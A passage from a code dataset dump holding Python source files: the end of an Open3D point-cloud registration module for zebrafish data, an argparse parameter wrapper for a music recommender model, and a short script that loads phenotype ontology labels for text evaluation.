range(len(self.other_source_channels)):\n print(f\"{i} - Processing Other Source and Target channels\")\n try:\n source_other_color = pd.read_excel(self.other_source_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n \n except XLRDError:\n \n \"\"\" Handling .csv files\"\"\"\n source_other_color = pd.read_csv(self.other_source_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n \n source_color_list = np.asarray(source_other_color)\n \n if self.mode == \"knn\":\n source_transformed = self.transform_source()\n X = np.asarray(source_transformed.points)\n y = source_color_list\n knn = neighbors.KNeighborsRegressor(self.n_neighbors, weights= self.weights)\n target_color_list = knn.fit(X, y).predict(np.asarray(target_new.points))\n print(target_color_list)\n other_registered_channels.append(target_color_list)\n continue \n \n elif self.mode == \"complete\":\n try:\n target_other_color = pd.read_excel(self.other_target_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n \n except: \n target_other_color = pd.read_csv(self.other_target_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n \n target_color_list = np.asarray(target_other_color)\n \n elif self.mode == \"null\":\n target_color_list = np.zeros(shape=(self.target_color.shape))\n \n \n if self.method == \"median\" or self.method == \"Median\": \n print(\"Using median averaging\")\n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n target_color_list[ind] = np.median(source_color_list[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n target_color_list[ind] = source_color_list[source_indices_unique]\n\n elif self.method == \"mean\" or self.method == \"Mean\" or self.method == \"average\" or self.method == \"Average\":\n print(\"Using mean averaging\")\n \n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n target_color_list[ind] = np.mean(source_color_list[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n target_color_list[ind] = source_color_list[source_indices_unique]\n \n other_registered_channels.append(target_color_list)\n \n self.update_other_registered_channels(other_registered_channels)\n \n ### Dealing with the color channel used for registration \n \n if self.mode == \"knn\":\n source_transformed = self.transform_source()\n X = np.asarray(source_transformed.points)\n y = self.source_color\n knn = neighbors.KNeighborsRegressor(self.n_neighbors, weights= self.weights)\n color_list = knn.fit(X, y).predict(np.asarray(target_new.points))\n \n else:\n if self.method == \"median\" or self.method == \"Median\": \n print(\"Using median averaging\")\n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n color_list[ind] = np.median(self.source_color[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n color_list[ind] = self.source_color[source_indices_unique]\n\n elif self.method == \"mean\" or self.method == \"Mean\" or self.method == \"average\" or self.method == \"Average\":\n print(\"Using mean averaging\")\n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n color_list[ind] = np.mean(self.source_color[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n color_list[ind] = self.source_color[source_indices_unique]\n else:\n raise Exception(\"Unrecognised method used. Only mean/average or median functions are permitted.\") \n\n if verbose:\n print(\"before assignment\", np.array(target_new.colors))\n\n mapped_rgb, mapped_col_range=colour_map(color_list,\"viridis\")\n\n target_new.colors =o3d.utility.Vector3dVector(mapped_rgb)\n \n self.update_registered_color(color_list)\n self.update_registered_target(target_new)\n\n if verbose:\n print(\"after assignment\", np.array(target_new.colors))\n print(np.all([mapped_rgb, np.array(target_new.colors)]))\n\n return (target_new,mapped_col_range, color_list)\n \nclass RegistrationObj_noisy(RegistrationObj):\n \n def __init__(self, pos_path_source, pos_path_target, color_path_source, color_path_target, \n algorithm = \"colored_icp\",**kwargs):\n super().__init__(pos_path_source, pos_path_target, color_path_source, color_path_target, **kwargs)\n self.noisy_registrationObj = []\n self.noisy_pcd_list = []\n self.noisy_pcd_temp = o3d.geometry.PointCloud()\n \n def update_noisy_pcd_list(self, noisy_pcd_list):\n self.noisy_pcd_list = noisy_pcd_list\n \n def update_noisy_registrationObj(self, noisy_registrationObj):\n self.noisy_registrationObj = noisy_registrationObj\n \n def global_ransac_registration(self, verbose = True):\n\n distance_threshold = self.voxel_size * self.ransac_dist_modifier\n\n if verbose:\n print(\":: RANSAC registration on point clouds.\")\n print(\" Since the voxel size is %.3f,\" % self.voxel_size)\n print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n result_ransac = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n self.noisy_pcd_temp, target_processed, source_fpfh, target_fpfh, self.ransac_mutual_filter, distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False), 4, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(self.ransac_edge_length),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(4000000, 500))\n\n self.registration_result_update(result_ransac)\n print(self.registration_result)\n self.result_status_update()\n\n return result_ransac\n\n def icp_registration(self, verbose = True): \n \"\"\" Implements the Point-to-Plane ICP registration algorithm and returns a registration.RegistrationResult object.\n \"\"\"\n\n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n distance_threshold = self.voxel_size * self.icp_dist_check\n\n result_icp = o3d.pipelines.registration.registration_icp(\n self.noisy_pcd_temp, target_processed, distance_threshold, ransac_transform.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPlane(),\n o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration = 2000))\n \n\n self.registration_result_update(result_icp)\n self.result_status_update()\n self.calculate_mae()\n \n return result_icp\n\n\n def colored_icp(self, verbose = True):\n \"\"\" Implements the Colored ICP registration algorithm and returns a registration.RegistrationResult object.\n\n Source: Adapted from open3d ICP registration documentation:http://www.open3d.org/docs/release/tutorial/pipelines/colored_pointcloud_registration.html\n \"\"\"\n print(\"Entering into colored_ICP\")\n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n current_transformation = ransac_transform.transformation\n\n source_colorreg = copy.deepcopy(self.noisy_pcd_temp)\n target_colorreg = copy.deepcopy(target_processed)\n\n if self.downsampling:\n source_colorreg = source_colorreg.voxel_down_sample(self.voxel_size)\n target_colorreg = target_colorreg.voxel_down_sample(self.voxel_size)\n\n source_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n target_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n result_icp_colored = o3d.pipelines.registration.registration_colored_icp(\n source_colorreg, target_colorreg, self.voxel_size, current_transformation,\n o3d.pipelines.registration.TransformationEstimationForColoredICP(),\n o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,\n relative_rmse=1e-6,\n max_iteration=100))\n\n current_transformation = result_icp_colored.transformation\n \n self.registration_result_update(result_icp_colored)\n self.result_status_update()\n self.calculate_mae()\n\n return result_icp_colored\n \n def simulate_noise(self, sd_range = 50, sd_interval = 3, sim_num = 2, ax = None, legend = True,\n title = None, x_label = \"Noise (standard deviation)\", y_label = \"Metric results\",\n results_only = False, verbose = False):\n \n self.create_pcd()\n\n \"\"\" Noise simulation\"\"\"\n noise_sd = np.linspace(0,sd_range,sd_interval)\n len_noise = len(noise_sd)\n size_data = np.asarray(self.source_pcd.points).shape\n\n noisy_pcd_list = []\n results_list = []\n noisy_registrationObj = []\n\n for j in range(sim_num):\n np.random.seed(j)\n print(f\"----------Simulation num: {j+1}----------\")\n for i in range(len_noise):\n source_pcd = copy.deepcopy(self.source_pcd)\n noise = np.random.normal(0,noise_sd[i],size_data)\n combined_noise = np.asarray(source_pcd.points) + noise\n self.noisy_pcd_temp.points=o3d.utility.Vector3dVector(np.asarray(combined_noise))\n \n noisy_pcd_temp = copy.deepcopy(self.noisy_pcd_temp)\n noisy_pcd_list.append(noisy_pcd_temp)\n myRegObj = self.perform_registration(verbose = verbose)\n MyRegObjCopy =copy.deepcopy(myRegObj)\n noisy_registrationObj.append(MyRegObjCopy)\n\n results_list.append([self.registration_result.fitness, self.registration_result.inlier_rmse, \n (self.registration_result.inlier_rmse)/(self.registration_result.fitness), \n self.mae, (self.mae)/(self.registration_result.fitness), np.asarray(self.registration_result.correspondence_set).shape[0]])\n\n self.update_noisy_pcd_list(noisy_pcd_list)\n self.update_noisy_registrationObj(noisy_registrationObj)\n result_array = np.array(results_list)\n result = np.reshape(result_array, (sim_num,sd_interval,6))\n result_mean = np.mean(result, axis = 0)\n\n fitness = [mylist[0] for mylist in result_mean]\n inlier_rmse = [mylist[1] for mylist in result_mean]\n scaled_inlier_rmse = [mylist[2] for mylist in result_mean]\n mae = [mylist[3] for mylist in result_mean]\n scaled_inlier_mae = [mylist[4] for mylist in result_mean]\n corr_num = [mylist[5] for mylist in result_mean]\n\n\n if results_only:\n return np.asarray([fitness, inlier_rmse, scaled_inlier_rmse, mae, scaled_inlier_mae, corr_num])\n\n else:\n \"\"\" Plotting\"\"\"\n\n if ax is None:\n ax = plt.gca()\n ax.plot(noise_sd, fitness, label='Fitness')\n ax.plot(noise_sd, inlier_rmse, label='Inlier RMSE')\n ax.plot(noise_sd, mae, label='MAE')\n\n if legend:\n ax.legend(loc = \"upper left\")\n\n if title:\n ax.set_title(label = title)\n\n if x_label:\n ax.set_xlabel(x_label)\n\n if y_label:\n ax.set_ylabel(y_label)\n\n return ax\n\nclass IterativePairwise():\n \n def __init__(self, pos_path_source_list, pos_path_target, color_path_source_list, color_path_target, \n algorithm = \"colored_icp\", **kwargs):\n \n self.pos_path_source_list= pos_path_source_list\n self.pos_path_target = pos_path_target\n self.source_pcd = []\n self.target_pcd = None\n self.color_path_source_list = color_path_source_list\n self.color_path_target = color_path_target\n self.algorithm = algorithm\n self.source_length = len(self.pos_path_source_list)\n self.combined_results = []\n self.registered_color = None\n self.registration_obj = []\n self.other_registered_channels = []\n self.mode = \"knn\"\n self.method = \"Median\"\n self.n_neighbors = kwargs.get('n_neighbors', 5)\n self.weights = kwargs.get('weights', \"distance\")\n \n \"\"\"Setting the arguments for RegistrationObj.create_pcd\"\"\"\n self.pos_skiprows = None\n self.pos_usecols = None\n self.pos_header = 0\n self.color_skiprows = None\n self.color_usecols = None\n self.color_header = 0\n \n self.__dict__.update(kwargs)\n \n self.other_source_channels = kwargs.get('other_source_channels', [])\n self.other_target_channels = kwargs.get('other_target_channels', [])\n \n def __str__(self):\n string = \"\"\"--- Iterative Pairwise Object--- \\nAlgorithm used = {0}\\nSource file names : {1}\\nNumber of source files : {2}\\nTarget file name: {3}\"\"\". format(self.algorithm, self.pos_path_source_list, self.source_length, self.pos_path_target) \n return string\n \n def __repr__(self):\n return self.__str__()\n \n def __getitem__(self, i):\n return self.combined_results[i]\n \n def update_combined_results(self, combined_results):\n self.combined_results = combined_results\n \n def update_registration_obj(self, registration_obj):\n self.registration_obj = registration_obj\n \n def update_registered_color(self, registered_color):\n self.registered_color = registered_color\n \n def update_other_registered_channels(self, other_registered_channels):\n self.other_registered_channels = other_registered_channels\n \n def update_source_pcd(self, source_pcd):\n self.source_pcd = source_pcd\n \n def update_target_pcd(self, target_pcd):\n self.target_pcd = target_pcd\n \n def iterative_registration(self, jupyter_visualise = True, verbose = True):\n assert (self.source_length == len(self.color_path_source_list)), \"Length of source positions list is different from the source color intensities list.\"\n assert (type(self.pos_path_target) == str), \"Target position path should be a string.\" \n \n result_color_list = []\n result_list = []\n source_pcd = []\n registration_obj = []\n other_registration_channels = []\n \n for i in range(self.source_length):\n print(f\"--- Registering Source dataset {i}\")\n if not len(self.other_source_channels):\n print(f\"--No other source channels detected\")\n myObj = RegistrationObj(self.pos_path_source_list[i], self.pos_path_target, \n self.color_path_source_list[i], self.color_path_target, algorithm = \"colored_icp\",\n pos_skiprows = self.pos_skiprows, pos_usecols = self.pos_usecols, \n color_skiprows = self.color_skiprows, color_usecols = self.color_usecols,\n mode = self.mode, method = self.method, n_neighbors = self.n_neighbors, \n weights = self.weights)\n myObj.perform_registration(verbose = verbose)\n target_new, _, color_list = myObj.map_source2target()\n result_color_list.append(color_list)\n other_registration_channels.append(myObj.other_registered_channels)\n result_list.append([myObj.registration_result.fitness, myObj.registration_result.inlier_rmse,\n (myObj.registration_result.inlier_rmse/myObj.registration_result.fitness), myObj.mae])\n source_pcd.append(myObj.source_pcd)\n registration_obj.append(myObj.registration_result)\n else:\n myObj = RegistrationObj(self.pos_path_source_list[i], self.pos_path_target, \n self.color_path_source_list[i], self.color_path_target, algorithm = \"colored_icp\",\n pos_skiprows = self.pos_skiprows, pos_usecols = self.pos_usecols, \n color_skiprows = self.color_skiprows, color_usecols = self.color_usecols,\n other_source_channels = self.other_source_channels[i],\n other_target_channels = self.other_target_channels,\n mode = self.mode, method = self.method, n_neighbors = self.n_neighbors, \n weights = self.weights)\n myObj.perform_registration(verbose = verbose)\n target_new, _, color_list = myObj.map_source2target()\n result_color_list.append(color_list)\n other_registration_channels.append(myObj.other_registered_channels)\n result_list.append([myObj.registration_result.fitness, myObj.registration_result.inlier_rmse,\n (myObj.registration_result.inlier_rmse/myObj.registration_result.fitness), myObj.mae])\n source_pcd.append(myObj.source_pcd)\n registration_obj.append(myObj.registration_result)\n \n \n self.update_combined_results(result_list)\n self.update_source_pcd(source_pcd)\n self.update_target_pcd(myObj.target_pcd)\n self.update_registration_obj(registration_obj)\n \n result_color_list = np.asarray(result_color_list)\n color_median = np.median(result_color_list, axis = 0)\n self.update_registered_color(color_median)\n \n other_registration_channels = np.asarray(other_registration_channels)\n other_color_median = np.median(other_registration_channels, axis = 0)\n self.update_other_registered_channels(other_color_median)\n \n image_rgb_final, _ = colour_map(color_median,\"viridis\")\n target_final = copy.deepcopy(myObj.target_pcd)\n target_final.colors=o3d.utility.Vector3dVector(image_rgb_final)\n \n if jupyter_visualise:\n visualizer = JVisualizer()\n visualizer.add_geometry(target_final)\n visualizer.show()\n \n return target_final\n \n \n","repo_name":"kane9530/ZebReg","sub_path":"RegistrationObj.py","file_name":"RegistrationObj.py","file_ext":"py","file_size_in_byte":49426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5283125845","text":"import argparse\nimport numpy as np\n\n##############################################################################################################\n\nclass PARAM_WRAPPER():\n\t\"\"\"\n\tManages all params for the myclasses and others. \n\tinput_params(): loads the params from argparse\n\tdefault_params(class_name): returns the default params for the class\n\tget_params(class_name): return the current params for the class\n\n\treturns variable, error_msg\n\tif error_msg is None, task completed succesfully. \n\t\"\"\"\n\tdef __init__(self):\n\n\t\tself.get_default_params(None)\n\t\tself.args = None\n\t\tself.args_dict = None\n\n\t\treturn \n\n\tdef input_params(self):\n\n\t\tparser = argparse.ArgumentParser()\n\t\t# 0) GENERAL\n\t\tparser.add_argument('--device', type=str, default=self.default_params['mymodel']['device'], help=\"Type of device\")\n\n\t\t# 1) DATA \n\t\tparser.add_argument('--Nsongs', type=int, default=self.default_params['mymodel']['Nsongs'], help=\"Number of different songs\")\n\n\t\t# \t\t1.1) PCOUNTS\n\t\tparser.add_argument('--userset_name', type=str, default=self.default_params['mymetadata']['userset_name'], help=\"File name for playcounts data\")\n\t\tparser.add_argument('--userset_path', type=str, default=self.default_params['mymetadata']['userset_path'], help=\"File path for playcounts data\")\n\t\tparser.add_argument('--pc_split', type=float, default=self.default_params['mydataset']['pc_split'], help=\"pcounts percentage of val and test\")\n\n\t\t# \t\t1.2) METADATA\n\t\tparser.add_argument('--metadata_name', type=str, default=self.default_params['mymetadata']['metadata_name'], help=\"Name of the metadata file\")\n\t\tparser.add_argument('--metadata_path', type=str, default=self.default_params['mymetadata']['metadata_path'], help=\"File path for metadata\")\n\t\tparser.add_argument('--Nmeta_classes', type=int, default=self.default_params['miscellaneous']['Nmeta_classes'], help=\"Number of different metadata classes\")\n\n\t\t# \t\t1.3) POSTDATA (dataset for post calculations)\n\t\tparser.add_argument('--bias_top', type=int, default=self.default_params['mymetadata']['bias_top'], help=\"Minimum number of songs in user_topsongs to be taken in care\")\n\t\tparser.add_argument('--bias_normal', type=int, default=self.default_params['mymetadata']['bias_normal'], help=\"Minimum number of songs in user_normalsongs to be taken in care\")\n\n\t\t# \t\t1.4) DATALOADER\n\t\tparser.add_argument('--batch_size', type=int, default=self.default_params['miscellaneous']['batch_size'], help=\"Batch size in one iteration\")\n\t\tparser.add_argument('--num_workers', type=int, default=self.default_params['miscellaneous']['num_workers'], help=\"Number of workers\")\n\t\tparser.add_argument('--seed', type=int, default=self.default_params['mydataset']['seed'], help=\"Random seed for numpy and torch\")\n\n\n\t\t# 2) MODEL\n\t\tparser.add_argument('--idim', type=int, default=self.default_params['mymodel']['idim'], help=\"Dimension of the user input of song's indexes\")\n\t\tparser.add_argument('--param_path', type=str, default=self.default_params['mymodel']['param_path'], help=\"File path for models parameters\")\n\n\t\t# \t\t2.1) STRUCTURE\n\t\tparser.add_argument('--dim', nargs='+', type=int, default=self.default_params['mymodel']['dim'], help=\"Dimensions for hidden layers\")\n\t\tparser.add_argument('--mod', type=str, default=self.default_params['mymodel']['mod'], help=\"Name of the model\")\n\t\t# flow\n\t\tparser.add_argument('--bias', type=str, default=self.default_params['mymodel']['bias'], help=\"Bias for embedding [y/n]\")\n\t\tparser.add_argument('--embname', type=str, default=self.default_params['mymodel']['embname'], help=\"Embedding model file name (ex. models/emb200)\")\n\t\tparser.add_argument('--blocksN', type=int, default=self.default_params['mymodel']['blocksN'], help=\"Number of blocks in flow\")\n\t\tparser.add_argument('--reduction_emb', type=str, default=self.default_params['mymodel']['reduction_emb'], help=\"Reduction for embedding\")\n\n\n\t\t# 3) OPTIMIZER\n\t\t# \t\t3.1) OPTIMIZER PARAMS\n\t\tparser.add_argument('--lr', type=float, default=self.default_params['mymodel']['lr'], help=\"Learning rate\")\n\t\tparser.add_argument('--lr_factor', type=float, default=self.default_params['miscellaneous']['lr_factor'], help=\"Factor for LR if patience is exceeded\")\n\n\t\t# \t\t3.2) LOSS\n\t\tparser.add_argument('--loss', type=str, default=self.default_params['mymodel']['loss'], help=\"Name of the loss function\")\n\t\t# KLD\n\t\tparser.add_argument('--beta', type=float, default=self.default_params['mymodel']['beta'], help=\"Loss coeficient for KLD\")\n\t\tparser.add_argument('--betastart', type=int, default=self.default_params['mymodel']['betastart'], help=\"Number of the epoch in which the KLD is added\")\n\n\t\t# \t\t3.3) TRAINING\n\t\tparser.add_argument('--n_epochs', type=int, default=self.default_params['miscellaneous']['n_epochs'], help=\"Number of epoch in training (n_epochs = 0 ==> random baseline)\")\n\t\tparser.add_argument('--patience', type=int, default=self.default_params['miscellaneous']['patience'], help=\"Number of epoch while test loss is increasing\")\n\t\tparser.add_argument('--restarts', type=int, default=self.default_params['miscellaneous']['restarts'], help=\"Number of times patience is exceeded\")\n\n\n\t\t# 4) ACTIONS\n\t\t# \t\t4.1) TODO\n\t\tparser.add_argument('--TODO', nargs='+', type=str, default=self.default_params['miscellaneous']['TODO'], help=\"Actions to perform\")\n\t\tparser.add_argument('--train_model', type=str, default=self.default_params['miscellaneous']['train_model'], help=\"Part of the flow model to train\")\n\t\tparser.add_argument('--train_tun', type=str, default=self.default_params['miscellaneous']['train_tun'], help=\"Train model using train+tuning\")\n\n\t\t# 5) Z_DATA\n\t\t# \t\t5.1) CALCULATION PARAMS\n\t\tparser.add_argument('--z_type_zdata', nargs='+', type=str, default=self.default_params['z_data']['z_type_zdata'], help=\"z_data types to calculate ['inp', 'out']\")\n\t\tparser.add_argument('--z_data_name', type=str, default=self.default_params['miscellaneous']['z_data_name'], help=\"Full path for z_data\")\n\t\tparser.add_argument('--N_users', type=int, default=self.default_params['z_data']['N_users'], help=\"Number of users used in z_data calculations\")\n\t\tparser.add_argument('--Nclusters', type=int, default=self.default_params['z_data']['Nclusters'], help=\"Number of clusters used in z_data calculations\")\n\t\t# \t\t5.2) PLOTING PARAMS\n\t\tparser.add_argument('--partition', nargs='+', type=str, default=self.default_params['miscellaneous']['partition'], help=\"Plot z partition ('test', 'train', 'val')\")\n\t\tparser.add_argument('--tags_zdata', nargs='+', type=str, default=self.default_params['miscellaneous']['tags_zdata'], help=\"tags to plot\")\n\t\tparser.add_argument('--tags_separated_zdata', type=str, default=self.default_params['miscellaneous']['tags_separated_zdata'], help=\"tags in different plots [y/n]\")\n\t\tparser.add_argument('--topNtag', type=int, default=self.default_params['miscellaneous']['topNtag'], help=\"TopN tags for each cluster\")\n\n\n\t\t# 6) TUNNING\n\t\tparser.add_argument('--minNclass', type=int, default=self.default_params[\"miscellaneous\"]['minNclass'], help=\"Minim N for each class in to do post calculations\")\n\t\t# \t\t6.1) PARAMS\n\t\tparser.add_argument('--z_type_tun', nargs='+', type=str, default=self.default_params[\"myrecom\"]['z_type_tun'], help=\"z_data types to use in tunning ['inp', 'out']\")\n\t\tparser.add_argument('--recomtype', type=str, nargs='+', default=self.default_params[\"myrecom\"]['recomtype'], help=\"Type of recommendation used [all]\")\n\t\tparser.add_argument('--alpha', type=float, nargs='+', default=self.default_params[\"myrecom\"]['alpha'], help=\"Coeficient for tunning [z' = z+alpha*...] (2 for range)\")\n\t\tparser.add_argument('--reli', type=float, nargs='+', default=self.default_params[\"myrecom\"]['reli'], help=\"reli coeficient for NDCG ([1, reli, 0])\")\n\t\tparser.add_argument('--topN', type=int, default=self.default_params[\"myrecom\"]['topN'], help=\"Number of recommended songs\")\n\t\tparser.add_argument('--alphaN', type=int, default=self.default_params[\"myrecom\"]['alphaN'], help=\"Split alpha range in N elements\")\n\t\tparser.add_argument('--reliN', type=int, default=self.default_params[\"myrecom\"]['reliN'], help=\"Split reli range in N elements\")\n\t\tparser.add_argument('--tunpost_factor', type=float, default=self.default_params['miscellaneous']['tunpost_factor'], help=\"Relation between alpa for tunning and postfiltering for tun+post recomtype\")\n\t\tparser.add_argument('--alpha_post_sat', type=float, default=self.default_params['miscellaneous']['alpha_post_sat'], help=\"Value of alpha for NDCG postfiltering saturation\")\n\t\tparser.add_argument('--NDCG_post_sat', type=float, default=self.default_params['miscellaneous']['NDCG_post_sat'], help=\"Value of NDCG postfiltering saturation\")\n\n\n\t\t# 7) NDCG\n\t\tparser.add_argument('--legend_NDCG', type=str, default=self.default_params['miscellaneous']['legend_NDCG'], help=\"Plot legend in NDCG\")\n\t\tparser.add_argument('--class_ave_NDCG', type=str, default=self.default_params['miscellaneous']['class_ave_NDCG'], help=\"Plot class average of NDCG\")\n\n\n\t\targs = parser.parse_args()\n\n\t\t# TRANSLATE AND CHECKS\n\t\tif args.n_epochs == 0: args.loss = \"dummy\"\n\n\t\tif args.bias == \"n\": args.bias = False\n\t\telse: args.bias = True\n\n\t\tif args.legend_NDCG == \"y\": args.legend_NDCG = True\n\t\telse: args.legend_NDCG = False\n\n\t\tif args.alpha is not None:\n\t\t\tif len(args.alpha) == 1:\n\t\t\t\tpass\n\t\t\telif len(args.alpha) == 2:\n\t\t\t\targs.alpha = np.linspace(args.alpha[0], args.alpha[1], args.alphaN)\n\t\t\telse:\n\t\t\t\treturn None, \"ERROR (PARAM_WRAPPER.input_params): --alpha must have len=1 or 2\"\n\n\t\tif args.reli is not None:\n\t\t\tif len(args.reli) == 1:\n\t\t\t\tpass\n\t\t\telif len(args.reli) == 2:\n\t\t\t\targs.reli = np.linspace(args.reli[0], args.reli[1], args.reliN)\n\t\t\telse:\n\t\t\t\treturn None, \"ERROR (PARAM_WRAPPER.input_params): --reli must have len=1 or 2\"\n\n\t\tif args.mod==\"flow\" and args.embname is None: return None, \"ERROR (PARAM_WRAPPER.input_params): Specify name for flow projector (--embname)\"\n\n\t\tif args.z_type_tun == \"\" and args.recomtype != [\"postfiltering\"]: return \"ERROR (PARAM_WRAPPER.input_params): Specify a z_data type to be used in tunning\"\n\n\t\tif args.Nmeta_classes == -1:\n\t\t\tif args.metadata_name == \"opt_tags\": args.Nmeta_classes = 1000\n\t\t\tif args.metadata_name == \"opt_tags_filtered\": args.Nmeta_classes = 59\n\t\t\tif args.metadata_name == \"opt_genre\": args.Nmeta_classes = 21\n\n\t\tif args.train_tun == \"y\": args.train_tun = True\n\t\telse: args.train_tun = False\n\n\t\tself.args_dict = vars(args) # converts args.Namespace() to dict\n\t\tself.args = args\n\n\t\treturn args, None\n\n\tdef get_default_params(self, class_name):\n\n\t\tdefault_params = {}\n\t\tdefault_params[\"mymodel\"] = {\n\t\t\t\t'idim':100,\n\t\t\t\t'Nsongs':180198,\n\t\t\t\t'device':'cuda',\n\t\t\t\t'loss':None,\n\t\t\t\t'dim':None,\n\t\t\t\t'mod':None,\n\t\t\t\t'beta':None,\n\t\t\t\t'betastart':None,\n\t\t\t\t'bias':True,\n\t\t\t\t'embname':None,\n\t\t\t\t'blocksN':4,\n\t\t\t\t'hN':4,\n\t\t\t\t'reduction_emb':'attention',\n\t\t\t\t'lr':1E-3,\n\t\t\t\t'model_path':'main/models',\n\t\t\t\t'param_path':'results/models',\n\t\t\t\t'Nmeta_classes':-1\n\t\t}\n\t\tdefault_params[\"mymetadata\"] = {\n\t\t\t\t'userset_name':'opt_pcounts',\n\t\t\t\t'userset_path':'results/metadata',\n\t\t\t\t'metadata_name':'opt_tags',\n\t\t\t\t'metadata_path':'results/metadata',\n\t\t\t\t'metadata_type':'list',\n\t\t\t\t'postset_name':'postset_opt_tags',\n\t\t\t\t'postset_path':'results/metadata',\n\t\t\t\t'bias_top':10,\n\t\t\t\t'bias_normal':10,\n\t\t\t\t'z_data_path':'results/z_data'\n\t\t}\n\t\tdefault_params[\"mydataset\"] = {\n\t\t\t\t'pc_split':0.1, #playcounts split for test and val\n\t\t\t\t'bias_top':1,\n\t\t\t\t'bias_normal':1,\n\t\t\t\t'seed':0\n\t\t}\n\t\tdefault_params[\"training_loss\"] = {\n\t\t\t\t'plot_path':'results/loss',\n\t\t\t\t'mymodel':None\n\t\t}\n\t\tdefault_params[\"z_data\"] = {\n\t\t\t\t'mymodel':None,\n\t\t\t\t'mymetadata':None,\n\t\t\t\t'mydataset':None,\n\t\t\t\t'Nclusters':10,\n\t\t\t\t'N_users':-1,\n\t\t\t\t'z_type_zdata':['out'],\n\t\t\t\t'z_data_name':None\n\t\t}\n\t\tdefault_params[\"myrecom\"] = {\n\t\t\t\t'z_type_tun':['out'],\n\t\t\t\t'recomtype':[],\n\t\t\t\t'alpha':[1.],\n\t\t\t\t'reli':[0.5],\n\t\t\t\t'topN':1000,\n\t\t\t\t'alphaN':10,\n\t\t\t\t'reliN':10,\n\t\t\t\t'z_data_type':'z_cluster'\n\t\t}\n\t\tdefault_params[\"miscellaneous\"] = {\n\t\t\t\t'batch_size':128,\n\t\t\t\t'num_workers':4,\n\t\t\t\t'lr_factor':0.1,\n\t\t\t\t'n_epochs':999,\n\t\t\t\t'patience':10,\n\t\t\t\t'restarts':2,\n\t\t\t\t'TODO':[],\n\t\t\t\t'partition':['train'],\n\t\t\t\t'tags_zdata':[],\n\t\t\t\t'tags_separated_zdata':False,\n\t\t\t\t'legend_NDCG':True,\n\t\t\t\t'class_ave_NDCG':True,\n\t\t\t\t'z_data_name':None,\n\t\t\t\t'topNtag':100,\n\t\t\t\t'minNclass':1,\n\t\t\t\t'tunpost_factor':None,\n\t\t\t\t'alpha_post_sat':None,\n\t\t\t\t'NDCG_post_sat':None,\n\t\t\t\t'train_model':\"\",\n\t\t\t\t'Nmeta_classes':-1,\n\t\t\t\t'train_tun':\"y\"\n\t\t}\n\n\t\tself.default_params = default_params\n\n\t\tif class_name is None: return\n\t\telse: return self.default_params[class_name]\n\n\tdef get_params(self, class_name):\n\n\t\tparam_names = self.default_params[class_name].keys()\n\t\tclass_params = self.default_params[class_name].copy()\n\t\tfor i,j in self.args_dict.items():\n\t\t\tif i in param_names: class_params[i] = j\n\n\t\treturn class_params\n\n##############################################################################################################","repo_name":"MarcSerraPeralta/rec-NN","sub_path":"main/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":12837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20579485421","text":"import pm_parser\nimport csv\n\nphe = {}\nwith open(\"ASDPTO.csv\",\"r\") as csvfile:\n reader=csv.reader(csvfile)\n for line in reader:\n label = line[1]\n if label == 'Preferred Label':\n continue\n label = label.lower()\n label = label.replace('-', '_')\n label = label.replace(' ', '_')\n phe[label] = '_asdpto'\n\n\nwith open(\"HP.csv\",\"r\") as csvfile:\n reader=csv.reader(csvfile)\n for line in reader:\n label = line[1]\n if label == 'Preferred Label':\n continue\n elif label[0:3] == 'HP_':\n continue\n label = label.lower()\n label = label.replace('-', '_')\n label = label.replace(' ', '_')\n if label in phe.keys():\n phe[label] += '_hp'\n else:\n phe[label] = '_hp'\n\nfilename = 'Autism_Pure_Testing.txt'\n\nwith open(filename, 'r') as file_to_read:\n while True:\n text_to_annotate = file_to_read.readline()\n pm_parser.evaluate(text_to_annotate, phe)\n","repo_name":"hsbEdin/Dissertation","sub_path":"Dissertation/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 